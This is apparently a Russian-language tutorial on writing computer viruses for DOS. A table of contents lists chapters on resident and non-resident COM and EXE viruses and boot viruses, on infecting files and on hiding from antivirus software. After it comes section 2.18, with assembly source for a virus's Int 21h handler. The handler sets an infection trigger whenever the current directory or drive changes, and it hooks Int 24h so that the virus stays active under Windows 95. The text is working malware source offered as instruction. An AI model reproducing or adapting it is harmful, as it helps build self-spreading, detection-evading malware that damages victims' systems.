- •Часть 1 . Com - вирусы ....................... 6
- •Глава 1 . Разработка нерезидентной
- •Глава 2 . Разработка резидентной
- •Часть 2 . Exe - вирусы ....................... 82
- •Глава 1 . Разработка нерезидентного
- •1.3 Как вирус может заразить
- •1.4 Работа вируса в
- •1.5 Начало работы ....................... 88
- •Глава 2 . Разработка резидентного
- •Часть 3 . Загрузочные вирусы ................. 143
- •Глава 1 . Разработка загрузочной
- •Часть 1 . Com - вирусы
- •Глава 1 . Разработка нерезидентной
- •1.5 Начало работы
- •1.6 Вирус получает управление
- •1.8 Запоминаем содержимое dta
- •1.9 Ищем подходящий файл
- •1.10 Читаем исходные три байта
- •1.11 Выполняем необходимые расчеты
- •1.12 Проверяем файл на зараженность
- •1.13 Заражаем com - программу
- •1.14 Восстанавливаем dta
- •1.16 Область данных вирусной программы
- •1.17 Завершаем запускающую программу
- •1.18 Текст нерезидентного com - вируса
- •1.19 Комментарии
- •1.20 Испытание вируса
- •Глава 2 . Разработка резидентной
- •2.3 Алгоритм работы резидентного
- •2.4 Заголовок вируса
- •2.5 Вирус начинает работу
- •2.6 Сохраняем регистры процессора
- •2.8 Запрашиваем блок памяти
- •2.9 Делаем вирус " незаметным "
- •2.10 Получаем вектора прерываний
- •2.11 Копируем вирусный код в память
- •2.12 Устанавливаем вектора прерываний
- •2.13 Пишем резидентную часть
- •2.14 Заражаем com - файл
- •2.15 Восстанавливаем регистры
- •2.16 Пишем обработчики прерываний
- •2.17 Обработчик Int 13h
- •2.18 Обработчик Int 21h
- •2.19 Обработчик Int 24h
- •2.20 Обработчик Int 2Fh
- •2.21 Обработчик Int 28h
- •2.22 Область данных вируса
- •2.23 Процедура идентификации command.Com
- •2.24 Завершаем программу
- •2.25 Текст резидентного com - вируса
- •2.26 Комментарии
- •2.27 Испытание вируса
- •Часть 2 . Exe - вирусы
- •Глава 1 . Разработка нерезидентного
- •1.1 Формат exe - файла на диске
- •1.5 Начало работы
- •1.6 Вирус получает управление
- •1.7 Ищем подходящий файл
- •1.8 Читаем заголовок файла
- •1.10 Заражаем exe - программу
- •1.11 Восстанавливаем dta
- •1.12 Восстанавливаем точку входа
- •1.13 Область данных вируса
- •1.14 Используемые процедуры
- •1.15 Работа завершена
- •Глава 2 . Разработка резидентного
- •2.1 Алгоритм работы резидентного
- •2.3 Как реализовать защиту от
- •2.4 Реализуем предложенный алгоритм
- •2.5 Пишем промежуточный обработчик
- •2.6 Защита от обнаружения вируса в файле
- •2.7 Несколько слов о вредных
- •Часть 3 . Загрузочные вирусы
- •Глава 1 . Разработка загрузочной
- •1.2 Понятие о загрузочных вирусах
- •1.3 Алгоритм работы загрузочного
- •1.5 Начало работы
- •1.6 Вирус получает управление
- •1.12 Используемые процедуры
- •1.13 Область данных вируса
- •1.16 Комментарии
- •1.17 Испытание вируса
2.18 Обработчик Int 21h
Рассмотрим теперь создание обработчика прерывания
Int 21h .Как мы договорились, он должен помещать
" единицу " в ячейку " tg_infect ", если DOS вы-
полняет смену текущего каталога или диска ( см п.
2.5 ) .Поэтому напишем " фильтр ", который будет
проверять, какая именно функция DOS вызвана в тот
или иной момент :
;-------------------------------------------------
to_new_21h equ $-vir
new_21h: jmp cs:start_21h
tg_infect db 0
start_21h: pushf
push di
push es
xor di,di ;Перехват
mov es,di ;INT 24h в рези-
mov di,90h ;дентном режиме
mov word ptr es:[di],to_new_24h
mov es:[di+2],cs
cmp ah,03bh ;Активизировать
;вирус ?
jne cs:new_cmp_1
mov cs:tg_infect-110h,1;Да - взводим
;триггер ...
new_cmp_1: cmp ah,00eh
jne cs:to_jump
mov cs:tg_infect - 110h,1
to_jump: pop es
pop di
popf
db 0eah ;Переход на ста-
old_21h dw 0 ;рый обработчик
old_21h_2 dw 0 ;INT 21h ...
Поскольку при вызове функции DOS в регистре AH за-
дается ее номер,достаточно просто проанализировать
его и " выловить " нужные значения.Наш вирус будет
реагировать на смену текущего каталога (AH=03Bh),и
смену текущего диска (AH=0Eh) .Эти числа и пытает-
ся обнаружить " фильтр " .
Далее - так как нам нужно всего лишь определить,
какая функция DOS вызвана, нет смысла после завер-
шения системного обработчика передавать управление
обратно в " фильтр " .По этой причине отпадает не-
обходимость сложных " манипуляций " со стеком, ко-
торые мы проделывали в предыдущем пункте .
Помимо решения своей конкретной задачи, написанный
нами обработчик используется для перехвата преры-
вания Int 24h.Делается это прямым обращением к та-
блице векторов прерываний . Так же перехватывает
прерывания и секция инициализации при установке
вируса в память .Правда, вы можете спросить, зачем
потребовалась такая сложная методика перехвата,
и почему бы не выполнить его в секции инициализа-
ции ? Дело в том, что такой прием будет "работать"
только в MS DOS .WINDOWS 95, например, постоянно
восстанавливает вектор Int 24h, что делает бессмы-
сленным изменение вектора " только один раз ".Тру-
дно сказать, зачем в WINDOWS 95 принято восстанав-
ливать вектор .Вероятно, это сделано для надежно-
сти работы системы .При создании резидентного EXE-
вируса мы поговорим еще об одной " странности "
этой популярной операционной системы,которая поме-
шает нам сделать вирусную программу " невидимой "
для антивирусных средств .